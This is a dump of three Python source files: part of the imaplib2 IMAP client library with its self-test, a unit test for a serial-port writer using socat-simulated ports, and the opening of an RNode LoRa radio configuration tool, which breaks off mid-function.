1 else: timeout = READ_POLL_TIMEMOUT try: r = poll.poll(timeout) if __debug__: self._log(5, 'poll => %s' % `r`) if not r: continue # Timeout fd,state = r[0] if state & select.POLLIN: data = self.read(32768) # Drain ssl buffer if present start = 0 dlen = len(data) if __debug__: self._log(5, 'rcvd %s' % dlen) if dlen == 0: rxzero += 1 if rxzero > 5: raise IOError("Too many read 0") time.sleep(0.1) else: rxzero = 0 while True: stop = data.find('\n', start) if stop < 0: line_part += data[start:] break stop += 1 line_part, start, line = \ '', stop, line_part + data[start:stop] if __debug__: self._log(4, '< %s' % line) self.inq.put(line) if state & ~(select.POLLIN): raise IOError(poll_error(state)) except: reason = 'socket error: %s - %s' % sys.exc_info()[:2] if __debug__: if not self.Terminate: self._print_log() if self.debug: self.debug += 4 # Output all self._log(1, reason) self.inq.put((self.abort, reason)) break poll.unregister(self.read_fd) if __debug__: self._log(1, 'finished') else: # No "poll" - use select() def _reader(self): threading.currentThread().setName(self.identifier + 'reader') if __debug__: self._log(1, 'starting using select') line_part = '' rxzero = 0 while not self.Terminate: if self.state == LOGOUT: timeout = 1 else: timeout = READ_POLL_TIMEMOUT try: r,w,e = select.select([self.read_fd], [], [], timeout) if __debug__: self._log(5, 'select => %s, %s, %s' % (r,w,e)) if not r: # Timeout continue data = self.read(32768) # Drain ssl buffer if present start = 0 dlen = len(data) if __debug__: self._log(5, 'rcvd %s' % dlen) if dlen == 0: rxzero += 1 if rxzero > 5: raise IOError("Too many read 0") time.sleep(0.1) else: rxzero = 0 while True: stop = data.find('\n', start) if stop < 0: line_part += data[start:] break stop += 1 line_part, start, line = \ '', stop, line_part + data[start:stop] if __debug__: self._log(4, '< %s' % line) self.inq.put(line) except: reason = 'socket error: %s - %s' % sys.exc_info()[:2] if __debug__: if not self.Terminate: self._print_log() if self.debug: self.debug += 4 # Output all self._log(1, reason) self.inq.put((self.abort, reason)) break if __debug__: self._log(1, 'finished') def _writer(self): threading.currentThread().setName(self.identifier + 'writer') if __debug__: self._log(1, 'starting') reason = 'Terminated' while not self.Terminate: rqb = self.ouq.get() if rqb is None: break # Outq flushed try: self.send(rqb.data) if __debug__: self._log(4, '> %s' % rqb.data) except: reason = 'socket error: %s - %s' % sys.exc_info()[:2] if __debug__: if not self.Terminate: self._print_log() if self.debug: self.debug += 4 # Output all self._log(1, reason) rqb.abort(self.abort, reason) break self.inq.put((self.abort, reason)) if __debug__: self._log(1, 'finished') # Debugging if __debug__: def _init_debug(self, debug=None, debug_file=None): self.debug = debug is not None and debug or Debug is not None and Debug or 0 self.debug_file = debug_file is not None and debug_file or sys.stderr self.debug_lock = threading.Lock() self._cmd_log_len = 20 self._cmd_log_idx = 0 self._cmd_log = {} # Last `_cmd_log_len' interactions if self.debug: self._mesg('imaplib2 version %s' % __version__) self._mesg('imaplib2 debug level %s' % self.debug) def _dump_ur(self, lvl): if lvl > self.debug: return l = self.untagged_responses if not l: return t = '\n\t\t' l = map(lambda x:'%s: "%s"' % (x[0], x[1][0] and '" "'.join(x[1]) or ''), l) self.debug_lock.acquire() self._mesg('untagged responses dump:%s%s' % (t, t.join(l))) self.debug_lock.release() def _log(self, lvl, line): if lvl > self.debug: return if line[-2:] == CRLF: line = line[:-2] + '\\r\\n' tn = threading.currentThread().getName() if self.debug >= 4: self.debug_lock.acquire() self._mesg(line, tn) self.debug_lock.release() return # Keep log of last `_cmd_log_len' interactions for debugging. self._cmd_log[self._cmd_log_idx] = (line, tn, time.time()) self._cmd_log_idx += 1 if self._cmd_log_idx >= self._cmd_log_len: self._cmd_log_idx = 0 def _mesg(self, s, tn=None, secs=None): if secs is None: secs = time.time() if tn is None: tn = threading.currentThread().getName() tm = time.strftime('%M:%S', time.localtime(secs)) self.debug_file.write(' %s.%02d %s %s\n' % (tm, (secs*100)%100, tn, s)) self.debug_file.flush() def _print_log(self): self.debug_lock.acquire() i, n = self._cmd_log_idx, self._cmd_log_len if n: self._mesg('last %d log messages:' % n) while n: try: self._mesg(*self._cmd_log[i]) except: pass i += 1 if i >= self._cmd_log_len: i = 0 n -= 1 self.debug_lock.release() class IMAP4_SSL(IMAP4): """IMAP4 client class over SSL connection Instantiate with: IMAP4_SSL(host=None, port=None, keyfile=None, certfile=None, debug=None, debug_file=None) host - host's name (default: localhost); port - port number (default: standard IMAP4 SSL port); keyfile - PEM formatted file that contains your private key (default: None); certfile - PEM formatted certificate chain file (default: None); debug - debug level (default: 0 - no debug); debug_file - debug stream (default: sys.stderr). For more documentation see the docstring of the parent class IMAP4. """ def __init__(self, host=None, port=None, keyfile=None, certfile=None, debug=None, debug_file=None, identifier=None): self.keyfile = keyfile self.certfile = certfile IMAP4.__init__(self, host, port, debug, debug_file, identifier) def open(self, host=None, port=None): """open(host=None, port=None) Setup secure connection to remote server on "host:port" (default: localhost:standard IMAP4 SSL port). This connection will be used by the routines: read, send, shutdown, socket, ssl.""" self.host = host is not None and host or '' self.port = port is not None and port or IMAP4_SSL_PORT self.sock = self.open_socket() try: import ssl self.sslobj = ssl.wrap_socket(self.sock, self.keyfile, self.certfile) except ImportError: self.sslobj = socket.ssl(self.sock, self.keyfile, self.certfile) self.read_fd = self.sock.fileno() def read(self, size): """data = read(size) Read at most 'size' bytes from remote.""" if self.decompressor is None: return self.sslobj.read(size) if self.decompressor.unconsumed_tail: data = self.decompressor.unconsumed_tail else: data = self.sslobj.read(8192) return self.decompressor.decompress(data, size) def send(self, data): """send(data) Send 'data' to remote.""" if self.compressor is not None: data = self.compressor.compress(data) data += self.compressor.flush(zlib.Z_SYNC_FLUSH) # NB: socket.ssl needs a "sendall" method to match socket objects. bytes = len(data) while bytes > 0: sent = self.sslobj.write(data) if sent == bytes: break # avoid copy data = data[sent:] bytes = bytes - sent def ssl(self): """ssl = ssl() Return socket.ssl instance used to communicate with the IMAP4 server.""" return self.sslobj class IMAP4_stream(IMAP4): """IMAP4 client class over a stream Instantiate with: IMAP4_stream(command, debug=None, debug_file=None) command - string that can be passed to subprocess.Popen(); debug - debug level (default: 0 - no debug); debug_file - debug stream (default: sys.stderr). For more documentation see the docstring of the parent class IMAP4. """ def __init__(self, command, debug=None, debug_file=None, identifier=None): self.command = command self.host = command self.port = None self.sock = None self.writefile, self.readfile = None, None self.read_fd = None IMAP4.__init__(self, debug=debug, debug_file=debug_file, identifier=identifier) def open(self, host=None, port=None): """open(host=None, port=None) Setup a stream connection via 'self.command'. This connection will be used by the routines: read, send, shutdown, socket.""" from subprocess import Popen, PIPE self._P = Popen(self.command, shell=True, stdin=PIPE, stdout=PIPE, close_fds=True) self.writefile, self.readfile = self._P.stdin, self._P.stdout self.read_fd = self.readfile.fileno() def read(self, size): """Read 'size' bytes from remote.""" if self.decompressor is None: return os.read(self.read_fd, size) if self.decompressor.unconsumed_tail: data = self.decompressor.unconsumed_tail else: data = os.read(self.read_fd, 8192) return self.decompressor.decompress(data, size) def send(self, data): """Send data to remote.""" if self.compressor is not None: data = self.compressor.compress(data) data += self.compressor.flush(zlib.Z_SYNC_FLUSH) self.writefile.write(data) self.writefile.flush() def shutdown(self): """Close I/O established in "open".""" self.readfile.close() self.writefile.close() class _Authenticator(object): """Private class to provide en/de-coding for base64 authentication conversation.""" def __init__(self, mechinst): self.mech = mechinst # Callable object to provide/process data def process(self, data, rqb): ret = self.mech(self.decode(data)) if ret is None: return '*' # Abort conversation return self.encode(ret) def encode(self, inp): # # Invoke binascii.b2a_base64 iteratively with # short even length buffers, strip the trailing # line feed from the result and append. "Even" # means a number that factors to both 6 and 8, # so when it gets to the end of the 8-bit input # there's no partial 6-bit output. # oup = '' while inp: if len(inp) > 48: t = inp[:48] inp = inp[48:] else: t = inp inp = '' e = binascii.b2a_base64(t) if e: oup = oup + e[:-1] return oup def decode(self, inp): if not inp: return '' return binascii.a2b_base64(inp) class _IdleCont(object): """When process is called, server is in IDLE state and will send asynchronous changes.""" def __init__(self, parent, timeout): self.parent = parent self.timeout = timeout is not None and timeout or IDLE_TIMEOUT self.parent.idle_timeout = self.timeout + time.time() def process(self, data, rqb): self.parent.idle_rqb = rqb self.parent.idle_timeout = self.timeout + time.time() if __debug__: self.parent._log(2, 'server IDLE started, timeout in %.2f secs' % self.timeout) return None Mon2num = {'Jan': 1, 'Feb': 2, 'Mar': 3, 'Apr': 4, 'May': 5, 'Jun': 6, 'Jul': 7, 'Aug': 8, 'Sep': 9, 'Oct': 10, 'Nov': 11, 'Dec': 12} InternalDate = re.compile(r'.*INTERNALDATE "' r'(?P<day>[ 0123][0-9])-(?P<mon>[A-Z][a-z][a-z])-(?P<year>[0-9][0-9][0-9][0-9])' r' (?P<hour>[0-9][0-9]):(?P<min>[0-9][0-9]):(?P<sec>[0-9][0-9])' r' (?P<zonen>[-+])(?P<zoneh>[0-9][0-9])(?P<zonem>[0-9][0-9])' r'"') def Internaldate2Time(resp): """time_tuple = Internaldate2Time(resp) Convert IMAP4 INTERNALDATE to UT.""" mo = InternalDate.match(resp) if not mo: return None mon = Mon2num[mo.group('mon')] zonen = mo.group('zonen') day = int(mo.group('day')) year = int(mo.group('year')) hour = int(mo.group('hour')) min = int(mo.group('min')) sec = int(mo.group('sec')) zoneh = int(mo.group('zoneh')) zonem = int(mo.group('zonem')) # INTERNALDATE timezone must be subtracted to get UT zone = (zoneh*60 + zonem)*60 if zonen == '-': zone = -zone tt = (year, mon, day, hour, min, sec, -1, -1, -1) utc = time.mktime(tt) # Following is necessary because the time module has no 'mkgmtime'. # 'mktime' assumes arg in local timezone, so adds timezone/altzone. lt = time.localtime(utc) if time.daylight and lt[-1]: zone = zone + time.altzone else: zone = zone + time.timezone return time.localtime(utc - zone) Internaldate2tuple = Internaldate2Time # (Backward compatible) def Time2Internaldate(date_time): """'"DD-Mmm-YYYY HH:MM:SS +HHMM"' = Time2Internaldate(date_time) Convert 'date_time' to IMAP4 INTERNALDATE representation.""" if isinstance(date_time, (int, float)): tt = time.localtime(date_time) elif isinstance(date_time, (tuple, time.struct_time)): tt = date_time elif isinstance(date_time, str) and (date_time[0],date_time[-1]) == ('"','"'): return date_time # Assume in correct format else: raise ValueError("date_time not of a known type") dt = time.strftime("%d-%b-%Y %H:%M:%S", tt) if dt[0] == '0': dt = ' ' + dt[1:] if time.daylight and tt[-1]: zone = -time.altzone else: zone = -time.timezone return '"' + dt + " %+03d%02d" % divmod(zone//60, 60) + '"' FLAGS_cre = re.compile(r'.*FLAGS \((?P<flags>[^\)]*)\)') def ParseFlags(resp): """('flag', ...) = ParseFlags(line) Convert IMAP4 flags response to python tuple.""" mo = FLAGS_cre.match(resp) if not mo: return () return tuple(mo.group('flags').split()) if __name__ == '__main__': # To test: invoke either as 'python imaplib2.py [IMAP4_server_hostname]', # or as 'python imaplib2.py -s "rsh IMAP4_server_hostname exec /etc/rimapd"' # or as 'python imaplib2.py -l "keyfile[:certfile]" [IMAP4_SSL_server_hostname]' import getopt, getpass try: optlist, args = getopt.getopt(sys.argv[1:], 'd:l:s:p:') except getopt.error, val: optlist, args = (), () debug, port, stream_command, keyfile, certfile = (None,)*5 for opt,val in optlist: if opt == '-d': debug = int(val) elif opt == '-l': try: keyfile,certfile = val.split(':') except ValueError: keyfile,certfile = val,val elif opt == '-p': port = int(val) elif opt == '-s': stream_command = val if not args: args = (stream_command,) if not args: args = ('',) if not port: port = (keyfile is not None) and IMAP4_SSL_PORT or IMAP4_PORT host = args[0] USER = getpass.getuser() data = open(os.path.exists("test.data") and "test.data" or __file__).read(1000) test_mesg = 'From: %(user)s@localhost%(lf)sSubject: IMAP4 test%(lf)s%(lf)s%(data)s' \ % {'user':USER, 'lf':'\n', 'data':data} test_seq1 = [ ('list', ('""', '%')), ('create', ('/tmp/imaplib2_test.0',)), ('rename', ('/tmp/imaplib2_test.0', '/tmp/imaplib2_test.1')), ('CREATE', ('/tmp/imaplib2_test.2',)), ('append', ('/tmp/imaplib2_test.2', None, None, test_mesg)), ('list', ('/tmp', 'imaplib2_test*')), ('select', ('/tmp/imaplib2_test.2',)), ('search', (None, 'SUBJECT', 'IMAP4 test')), ('fetch', ('1', '(FLAGS INTERNALDATE RFC822)')), ('store', ('1', 'FLAGS', '(\Deleted)')), ('namespace', ()), ('expunge', ()), ('recent', ()), ('close', ()), ] test_seq2 = ( ('select', ()), ('response',('UIDVALIDITY',)), ('response', ('EXISTS',)), ('append', (None, None, None, test_mesg)), ('uid', ('SEARCH', 'SUBJECT', 'IMAP4 test')), ('uid', ('SEARCH', 'ALL')), ('uid', ('THREAD', 'references', 'UTF-8', '(SEEN)')), ('recent', ()), ) AsyncError = None def responder((response, cb_arg, error)): global AsyncError cmd, args = cb_arg if error is not None: AsyncError = error M._mesg('[cb] ERROR %s %.100s => %s' % (cmd, args, error)) return typ, dat = response M._mesg('[cb] %s %.100s => %s %.100s' % (cmd, args, typ, dat)) if typ == 'NO': AsyncError = (Exception, dat[0]) def run(cmd, args, cb=True): if AsyncError: M.logout() typ, val = AsyncError raise typ(val) M._mesg('%s %.100s' % (cmd, args)) try: if cb: typ, dat = getattr(M, cmd)(callback=responder, cb_arg=(cmd, args), *args) if M.debug: M._mesg('%s %.100s => %s %.100s' % (cmd, args, typ, dat)) else: typ, dat = getattr(M, cmd)(*args) M._mesg('%s %.100s => %s %.100s' % (cmd, args, typ, dat)) except: M.logout() raise if typ == 'NO': M.logout() raise Exception(dat[0]) return dat try: threading.currentThread().setName('main') if keyfile is not None: if not keyfile: keyfile = None if not certfile: certfile = None M = IMAP4_SSL(host=host, port=port, keyfile=keyfile, certfile=certfile, debug=debug, identifier='') elif stream_command: M = IMAP4_stream(stream_command, debug=debug, identifier='') else: M = IMAP4(host=host, port=port, debug=debug, identifier='') if M.state != 'AUTH': # Login needed PASSWD = getpass.getpass("IMAP password for %s on %s: " % (USER, host or "localhost")) test_seq1.insert(0, ('login', (USER, PASSWD))) M._mesg('PROTOCOL_VERSION = %s' % M.PROTOCOL_VERSION) M._mesg('CAPABILITIES = %r' % (M.capabilities,)) if 'COMPRESS=DEFLATE' in M.capabilities: M.enable_compression() for cmd,args in test_seq1: run(cmd, args) for ml in run('list', ('/tmp/', 'imaplib2_test%'), cb=False): mo = re.match(r'.*"([^"]+)"$', ml) if mo: path = mo.group(1) else: path = ml.split()[-1] run('delete', (path,)) for cmd,args in test_seq2: if (cmd,args) != ('uid', ('SEARCH', 'SUBJECT', 'IMAP4 test')): run(cmd, args) continue dat = run(cmd, args, cb=False) uid = dat[-1].split() if not uid: continue run('uid', ('FETCH', uid[-1], '(FLAGS INTERNALDATE RFC822.SIZE RFC822.HEADER RFC822.TEXT)')) run('uid', ('STORE', uid[-1], 'FLAGS', '(\Deleted)')) run('expunge', ()) if 'IDLE' in M.capabilities: run('idle', (2,), cb=False) run('idle', (99,), cb=True) # Asynchronous, to test interruption of 'idle' by 'noop' time.sleep(1) run('noop', (), cb=False) run('logout', (), cb=False) if debug: M._mesg('') M._print_log() M._mesg('') M._mesg('unused untagged responses in order, most recent last:') for typ,dat in M.pop_untagged_responses(): M._mesg('\t%s %s' % (typ, dat)) print 'All tests OK.' except: print 'Tests failed.' if not debug: print ''' If you would like to see debugging output, try: %s -d5 ''' % sys.argv[0] raise
test_serial_writer.py
#!/usr/bin/env python3 import logging import os import subprocess import sys import tempfile import time import threading import unittest import warnings from os.path import dirname, realpath sys.path.append(dirname(dirname(dirname(realpath(__file__))))) from logger.readers.serial_reader import SerialReader # noqa: E402 from logger.writers.serial_writer import SerialWriter # noqa: E402 SAMPLE_DATA = """2017-11-04T05:12:19.275337Z $HEHDT,234.76,T*1b 2017-11-04T05:12:19.527360Z $HEHDT,234.73,T*1e 2017-11-04T05:12:19.781738Z $HEHDT,234.72,T*1f 2017-11-04T05:12:20.035450Z $HEHDT,234.72,T*1f 2017-11-04T05:12:22.312971Z $HEHDT,235.66,T*1b""" SAMPLE_MAX_BYTES_2 = ['$H', 'EH', 'DT', ',2', '34', '.7', '6,', 'T*', '1b'] SAMPLE_TIMEOUT = [None, '$HEHDT,234.76,T*1b', None, None, '$HEHDT,234.73,T*1e', None, None, '$HEHDT,234.72,T*1f', None, None, '$HEHDT,234.72,T*1f', None, None] class SimSerialPort: """Create a virtual serial port and feed stored logfile data to it.""" ############################ def __init__(self, port, baudrate=9600, bytesize=8, parity='N', stopbits=1, timeout=None, xonxoff=False, rtscts=False, write_timeout=None, dsrdtr=False, inter_byte_timeout=None, exclusive=None): """We'll create two virtual ports: 'port' and 'port_in'; we will write to port_in and read the values back out from port.""" self.read_port = port self.write_port = port + '_in' self.serial_params = {'baudrate': baudrate, 'byteside': bytesize, 'parity': parity, 'stopbits': stopbits, 'timeout': timeout, 'xonxoff': xonxoff, 'rtscts': rtscts, 'write_timeout': write_timeout, 'dsrdtr': dsrdtr, 'inter_byte_timeout': inter_byte_timeout, 'exclusive': exclusive} self.quit_flag = False # Finally, find path to socat executable self.socat_path = None for socat_path in ['/usr/bin/socat', '/usr/local/bin/socat']: if os.path.exists(socat_path) and os.path.isfile(socat_path): self.socat_path = socat_path if not self.socat_path: raise NameError('Executable "socat" not found on path. Please refer ' 'to installation guide to install socat.') ############################ def _run_socat(self): """Internal: run the actual command.""" verbose = '-d' write_port_params = 'pty,link=%s,raw,echo=0' % self.write_port read_port_params = 'pty,link=%s,raw,echo=0' % self.read_port cmd = [self.socat_path, verbose, # verbose, # repeating makes it more verbose read_port_params, write_port_params, ] try: # Run socat process using Popen, checking every second or so whether # it's died (poll() != None) or we've gotten a quit signal. logging.info('Calling: %s', ' '.join(cmd)) socat_process = subprocess.Popen(cmd) while not self.quit_flag and not socat_process.poll(): try: socat_process.wait(1) except subprocess.TimeoutExpired: pass except Exception as e: logging.error('ERROR: socat command: %s', e) # If here, process has terminated, or we've seen self.quit_flag. We # want both to be true: if we've terminated, set self.quit so that # 'run' loop can exit. If self.quit_flag, terminate process. if self.quit_flag: socat_process.kill() # TODO: Need to delete simulated ports! else: self.quit_flag = True logging.info('Finished: %s', ' '.join(cmd)) ############################ def run(self): """Create the virtual port with socat and start feeding it records from the designated logfile. If loop==True, loop when reaching end of input.""" self.socat_thread = threading.Thread(target=self._run_socat, daemon=True) self.socat_thread.start() ############################ def quit(self): self.quit_flag = True ################################################################################ class TestSerialWriter(unittest.TestCase): ############################ # Set up set up simulated serial in/out ports def setUp(self): warnings.simplefilter("ignore", ResourceWarning) # Set up simulated in/out serial ports self.tmpdir = tempfile.TemporaryDirectory() self.tmpdirname = self.tmpdir.name logging.info('created temporary directory "%s"', self.tmpdirname) ############################ # Test a couple cases and the quiet flag def test_write(self): temp_port = self.tmpdirname + '/readline' temp_port_in = temp_port + '_in' sim_serial = SimSerialPort(temp_port) sim_serial.run() # Give it a moment to get started time.sleep(0.1) def _run_reader(port): reader = SerialReader(port) for line in SAMPLE_DATA.split('\n'): result = reader.read() logging.info('data: %s, read: %s', line, result) self.assertEqual(line, result) def _run_writer(in_port): writer = SerialWriter(port=in_port) for line in SAMPLE_DATA.split('\n'): logging.info('wrote: %s', line) writer.write(line + '\n') def _run_read_specialcase(port): reader = SerialReader(port) res = reader.read() logging.info('data: %s', 'read: %s', '♥�♥\x00♥♥', res) self.assertEqual('♥�♥\x00♥♥', res) def _run_write_specialcase(in_port): writer = SerialWriter(in_port, quiet=True) writer.write('♥�♥\x00♥♥' + '\n') logging.info('wrote: %s', '♥�♥\x00♥♥') reader_thread = threading.Thread(target=_run_reader, kwargs={'port': temp_port}) reader_thread.start() writer_thread = threading.Thread(target=_run_writer, kwargs={'in_port': temp_port_in}) writer_thread.start() logging.info('Started threads') writer_thread.join() logging.info('Writer thread completed') reader_thread.join() logging.info('Reader thread completed') reader_thread = threading.Thread(target=_run_read_specialcase, kwargs={'port': temp_port}) reader_thread.start() writer_thread = threading.Thread(target=_run_write_specialcase, kwargs={'in_port': temp_port_in}) writer_thread.start() logging.info('Started threads') writer_thread.join() logging.info('Writer thread completed') reader_thread.join() logging.info('Reader thread completed') # Tell simulated serial port to shut down sim_serial.quit() ################################################################################ if __name__ == '__main__': import argparse parser = argparse.ArgumentParser() parser.add_argument('-v', '--verbosity', dest='verbosity', default=0, action='count', help='Increase output verbosity') args = parser.parse_args() LOGGING_FORMAT = '%(asctime)-15s %(filename)s:%(lineno)d %(message)s' logging.basicConfig(format=LOGGING_FORMAT) LOG_LEVELS = {0: logging.WARNING, 1: logging.INFO, 2: logging.DEBUG} args.verbosity = min(args.verbosity, max(LOG_LEVELS)) logging.getLogger().setLevel(LOG_LEVELS[args.verbosity]) # unittest.main(warnings='ignore') unittest.main()
rnodeconf.py
#!python3 # MIT License # # Copyright (c) 2018 Mark Qvist - unsigned.io # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. from time import sleep import argparse import threading import os import os.path import struct import datetime import time import math from urllib.request import urlretrieve from importlib import util program_version = "1.0.0" rnode = None rnode_serial = None rnode_baudrate = 115200 known_keys = [["unsigned.io", "30819f300d06092a864886f70d010101050003818d0030818902818100e5d46084e445595376bf7efd9c6ccf19d39abbc59afdb763207e4ff68b8d00ebffb63847aa2fe6dd10783d3ea63b55ac66f71ad885c20e223709f0d51ed5c6c0d0b093be9e1d165bb8a483a548b67a3f7a1e4580f50e75b306593fa6067ae259d3e297717bd7ff8c8f5b07f2bed89929a9a0321026cf3699524db98e2d18fb2d020300ff39"]] ranges = { 0xA4: [410000000, 525000000, 14], 0xA9: [820000000, 1020000000, 17] } firmware_update_url = "https://github.com/markqvist/RNode_Firmware/raw/master/Precompiled/rnode_firmware_latest.hex" class RNS(): @staticmethod def log(msg): logtimefmt = "%Y-%m-%d %H:%M:%S" timestamp = time.time() logstring = "["+time.strftime(logtimefmt)+"] "+msg print(logstring) @staticmethod def hexrep(data, delimit=True): delimiter = ":" if not delimit: delimiter = "" hexrep = delimiter.join("{:02x}".format(c) for c in data) return hexrep @staticmethod def prettyhexrep(data): delimiter = "" hexrep = "<"+delimiter.join("{:02x}".format(c) for c in data)+">" return hexrep class KISS(): FEND = 0xC0 FESC = 0xDB TFEND = 0xDC TFESC = 0xDD CMD_UNKNOWN = 0xFE CMD_DATA = 0x00 CMD_FREQUENCY = 0x01 CMD_BANDWIDTH = 0x02 CMD_TXPOWER = 0x03 CMD_SF = 0x04 CMD_CR = 0x05 CMD_RADIO_STATE = 0x06 CMD_RADIO_LOCK = 0x07 CMD_DETECT = 0x08 CMD_READY = 0x0F CMD_STAT_RX = 0x21 CMD_STAT_TX = 0x22 CMD_STAT_RSSI = 0x23 CMD_STAT_SNR = 0x24 CMD_BLINK = 0x30 CMD_RANDOM = 0x40 CMD_FW_VERSION = 0x50 CMD_ROM_READ = 0x51 CMD_ROM_WRITE = 0x52 CMD_ROM_WIPE = 0x59 CMD_CONF_SAVE = 0x53 CMD_CONF_DELETE = 0x54 DETECT_REQ = 0x73 DETECT_RESP = 0x46 RADIO_STATE_OFF = 0x00 RADIO_STATE_ON = 0x01 RADIO_STATE_ASK = 0xFF CMD_ERROR = 0x90 ERROR_INITRADIO = 0x01 ERROR_TXFAILED = 0x02 ERROR_EEPROM_LOCKED = 0x03 @staticmethod def escape(data): data = data.replace(bytes([0xdb]), bytes([0xdb, 0xdd])) data = data.replace(bytes([0xc0]), bytes([0xdb, 0xdc])) return data class ROM(): PRODUCT_RNODE = 0x03 MODEL_A4 = 0xA4 MODEL_A9 = 0xA9 ADDR_PRODUCT = 0x00 ADDR_MODEL = 0x01 ADDR_HW_REV = 0x02 ADDR_SERIAL = 0x03 ADDR_MADE = 0x07 ADDR_CHKSUM = 0x0B ADDR_SIGNATURE = 0x1B ADDR_INFO_LOCK = 0x9B ADDR_CONF_SF = 0x9C ADDR_CONF_CR = 0x9D ADDR_CONF_TXP = 0x9E ADDR_CONF_BW = 0x9F ADDR_CONF_FREQ = 0xA3 ADDR_CONF_OK = 0xA7 INFO_LOCK_BYTE = 0x73 CONF_OK_BYTE = 0x73 class RNode(): def __init__(self, serial_instance): self.serial = serial_instance self.timeout = 100 self.r_frequency = None self.r_bandwidth = None self.r_txpower = None self.r_sf = None self.r_state = None self.r_lock = None self.sf = None self.cr = None self.txpower = None self.frequency = None self.bandwidth = None self.detected = None self.eeprom = None self.major_version = None self.minor_version = None self.version = None self.provisioned = None self.product = None self.model = None self.hw_rev = None self.made = None self.serialno = None self.checksum = None self.signature = None self.signature_valid = False self.locally_signed = False self.vendor = None self.min_freq = None self.max_freq = None self.max_output = None self.configured = None self.conf_sf = None self.conf_cr = None self.conf_txpower = None self.conf_frequency = None self.conf_bandwidth = None def readLoop(self): try: in_frame = False escape = False command = KISS.CMD_UNKNOWN data_buffer = b"" command_buffer = b"" last_read_ms = int(time.time()*1000) while self.serial.is_open: if self.serial.in_waiting: byte = ord(self.serial.read(1)) last_read_ms = int(time.time()*1000) if (in_frame and byte == KISS.FEND and command == KISS.CMD_ROM_READ): self.eeprom = data_buffer in_frame = False data_buffer = b"" command_buffer = b"" elif (byte == KISS.FEND): in_frame = True command = KISS.CMD_UNKNOWN data_buffer = b"" command_buffer = b"" elif (in_frame and len(data_buffer) < 512): if (len(data_buffer) == 0 and command == KISS.CMD_UNKNOWN): command = byte elif (command == KISS.CMD_ROM_READ): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False data_buffer = data_buffer+bytes([byte]) elif (command == KISS.CMD_DATA): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False data_buffer = data_buffer+bytes([byte]) elif (command == KISS.CMD_FREQUENCY): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 4): self.r_frequency = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3] RNS.log("Radio reporting frequency is "+str(self.r_frequency/1000000.0)+" MHz") self.updateBitrate() elif (command == KISS.CMD_BANDWIDTH): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 4): self.r_bandwidth = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3] RNS.log("Radio reporting bandwidth is "+str(self.r_bandwidth/1000.0)+" KHz") self.updateBitrate() elif (command == KISS.CMD_FW_VERSION): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 2): self.major_version = command_buffer[0] self.minor_version = command_buffer[1] self.updateVersion() elif (command == KISS.CMD_TXPOWER): self.r_txpower = byte RNS.log("Radio reporting TX power is "+str(self.r_txpower)+" dBm") elif (command == KISS.CMD_SF): self.r_sf = byte RNS.log("Radio reporting spreading factor is "+str(self.r_sf)) self.updateBitrate() elif (command == KISS.CMD_CR): self.r_cr = byte RNS.log("Radio reporting coding rate is "+str(self.r_cr)) self.updateBitrate() elif (command == KISS.CMD_RADIO_STATE): self.r_state = byte elif (command == KISS.CMD_RADIO_LOCK): self.r_lock = byte elif (command == KISS.CMD_STAT_RX): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 4): self.r_stat_rx = ord(command_buffer[0]) << 24 | ord(command_buffer[1]) << 16 | ord(command_buffer[2]) << 8 | ord(command_buffer[3]) elif (command == KISS.CMD_STAT_TX): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 4): self.r_stat_tx = ord(command_buffer[0]) << 24 | ord(command_buffer[1]) << 16 | ord(command_buffer[2]) << 8 | ord(command_buffer[3]) elif (command == KISS.CMD_STAT_RSSI): self.r_stat_rssi = byte-RNodeInterface.RSSI_OFFSET elif (command == KISS.CMD_STAT_SNR): self.r_stat_snr = int.from_bytes(bytes([byte]), byteorder="big", signed=True) * 0.25 elif (command == KISS.CMD_RANDOM): self.r_random = byte elif (command == KISS.CMD_ERROR): if (byte == KISS.ERROR_INITRADIO): RNS.log(str(self)+" hardware initialisation error (code "+RNS.hexrep(byte)+")") elif (byte == KISS.ERROR_INITRADIO): RNS.log(str(self)+" hardware TX error (code "+RNS.hexrep(byte)+")") else: RNS.log(str(self)+" hardware error (code "+RNS.hexrep(byte)+")") elif (command == KISS.CMD_DETECT): if byte == 